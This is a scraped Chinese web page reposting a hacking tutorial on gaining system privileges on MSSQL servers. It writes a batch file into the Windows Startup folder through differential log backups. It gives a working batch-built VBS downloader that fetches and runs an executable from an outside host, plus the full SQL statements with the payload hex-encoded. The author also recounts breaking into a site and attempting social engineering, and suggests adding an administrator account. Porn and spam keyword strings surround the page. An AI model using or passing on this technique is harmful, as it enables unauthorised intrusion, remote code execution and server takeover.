久久久久久久久一,国产欧美一区二区精品婷婷,涩涩涩视频在线观看

主頁 > 知識庫 > MSSQL差異備份取系統(tǒng)權限的相關軟件下載

MSSQL差異備份取系統(tǒng)權限的相關軟件下載

昨天在網(wǎng)上找資料的時間無意進了一個站，糊里糊涂就進去了，想提權提不起來，后來加上服務商的Q號想社工一下，射了半天得知服務器的安全是綠盟的人給做的安全，后來就問豬豬有什么提權的方法沒，他剛好做了這個動畫就給發(fā)來過來，在網(wǎng)上查了一下找到了文章，一起拷貝過來.最近忙著學習很少關注這方面的東西，落后了，落后了......

下面是是在網(wǎng)上找到的資料和動畫.

TEAM里的內(nèi)部資料放久了,現(xiàn)在不放出來,遲早會有人發(fā)掘出來的！既然如此就拿出來大家分享吧！
MSSQL差異備份獲取webshell 幾乎人人皆知,那么我們可以利用差異備份出來的文件當作惡意代碼
讓系統(tǒng)執(zhí)行了之后自動提升權限或者添加管理員嗎？答案當然可以了,kj021320測試了N次之后跟你說！

那么我們得考慮文件擺放的位置~什么地方系統(tǒng)會運行呢？這個其實算是廢話吧！
大家不用想都知道通用地方 C:\Documents and Settings\All Users\「開始」菜單\程序\啟動
呵呵位置有了！　那么我們備份什么文件讓系統(tǒng)能執(zhí)行的呢？
這個是第一個關鍵點~！
EXE  JS  VBS  BAT這些文件大家第一時間想到的了
那些我一個一個來分析 exe的話！絕對能了！但是 MSSQL差異備份這么多垃圾肯定會把exe弄壞的！
否決掉
然后到腳本
VBS 我們能不能把他的垃圾信息注釋掉呢？不然VBS 會執(zhí)行不了！ OK 學過VBS的朋友都知道
VBS里面有2種注釋 '  還有就是 rem
但是還是會有垃圾信息屏蔽不了
否決掉

JS呢？ JS里面有多行注釋的/**/  但是 /* 不可能在首行吧？
否決掉

最后剩下我們最熟悉的bat批處理了！
OK我們繼續(xù)分析 bat里面注釋是什么呢？也是REM,失敗啊！之前vbs那里不行這里的rem注釋也一樣不行的！
那么我們怎么辦呢？其實很簡單！當我們在CMD下面敲錯了命令系統(tǒng)會怎樣呢？

說到這里要是大家不往文章下面看也一樣能想到方法了吧~

OK我們繼續(xù)探~~這里是最最關鍵點,差異備份出來的垃圾信息我們可以通過用回車把他提交了！
而系統(tǒng)只當作無用的命令來處理！不影響我們的操作！
問題就這樣解決了嗎？不是的！~MSSQL備份的時候,到一定的字符長度就會出現(xiàn)垃圾的字符,那個字符會影響我們的操作！
那么我們得把語句盡量縮少,越少越好~
OK那我們思路好了就采用bat 寫一個VBS的下載者然后執(zhí)行這個下載者最后通過下載者down回來的馬子來獲取系統(tǒng)權限
下面是我改過的生成下載者的BAT

echo Set P=createObject("Microsoft.XMLHTTP")>k.vbs
echo P.Open "GET","http://www.isto.cn/t.exe",0 >>k.vbs
echo P.Send():set G=createObject("ADODB.Stream")>>k.vbs
echo G.Mode=3:G.Type=1:G.Open() >>k.vbs
echo G.Write P.ResponseBody:G.SaveToFile "t.exe",2 >>k.vbs
k.vbs
t

下一個k.VBS然后k.vbs下載一個t.exe文件保存到本地直接執(zhí)行
記得記得我說過的代碼前面一定要用回車把垃圾數(shù)據(jù)提交最好2以上個回車
然后實現(xiàn)差異備份

alter database ISTO set RECOVERY FULL--
create table cmd (a image)--
backup log ISTO to disk = 'c:\cmd1' with init--
insert into cmd (a) values (0x130A0D0A6563686F2053657420503D6372656174654F626A65637428224D696372

6F736F66742E584D4C4854545022293E6B2E7662730D0A6563686F20502E4F70656E2

022474554222C22687474703A2F2F7777772E6973746F2E636E2F742E657865222C30

203E3E6B2E7662730D0A6563686F20502E53656E6428293A73657420473D63726561

74654F626A656374282241444F44422E53747265616D22293E3E6B2E7662730D0A65

63686F20472E4D6F64653D333A472E547970653D313A472E4F70656E2829203E3E6B

2E76627320200D0A6563686F20472E577269746520502E526573706F6E7365426F64

793A472E53617665546F46696C652022742E657865222C32203E3E6B2E7662730D0A

6B2E7662730D0A740D0A)--
backup log ISTO to disk = 'C:\Documents and Settings\All Users\「開始」菜單\程序\啟動\1.bat'--
drop table cmd--

OK bat出來了！至于怎樣讓服務器重啟呢！這個問題遺留給你們?nèi)ビ懻摪桑?
要是服務器直接開啟了3389 那就更方便了！直接bat 一個添加管理員的命令更爽！

isto是動畫里用到的工具.
isto輔助轉(zhuǎn)換工具.rar
mssql差異備份取系統(tǒng)權限.rar

您可能感興趣的文章:

C#實現(xiàn)MySQL命令行備份和恢復
C#實現(xiàn)的SQL備份與還原功能示例
c#使用file.copy實現(xiàn)文件備份示例
Python 實現(xiàn)文件的全備份和差異備份詳解
Python實現(xiàn)網(wǎng)站文件的全備份和差異備份
sqlserver 手工實現(xiàn)差異備份的步驟
提權思路之MSSQL差異備份取系統(tǒng)權限
復習一下sql server的差異備份
C#寫差異文件備份工具的示例

標簽：來賓營口無錫寶雞七臺河西寧邯鄲汕尾

巨人網(wǎng)絡通訊聲明：本文標題《MSSQL差異備份取系統(tǒng)權限的相關軟件下載》，本文關鍵詞 MSSQL,差異,備份,取,系統(tǒng),；如發(fā)現(xiàn)本文內(nèi)容存在版權問題，煩請?zhí)峁┫嚓P信息告之我們，我們將及時溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡，涉及言論、版權與本站無關。

校园春色亚洲色图_亚洲视频分类_中文字幕精品一区二区精品_麻豆一区区三区四区产品精品蜜桃

MSSQL差異備份取系統(tǒng)權限的相關軟件下載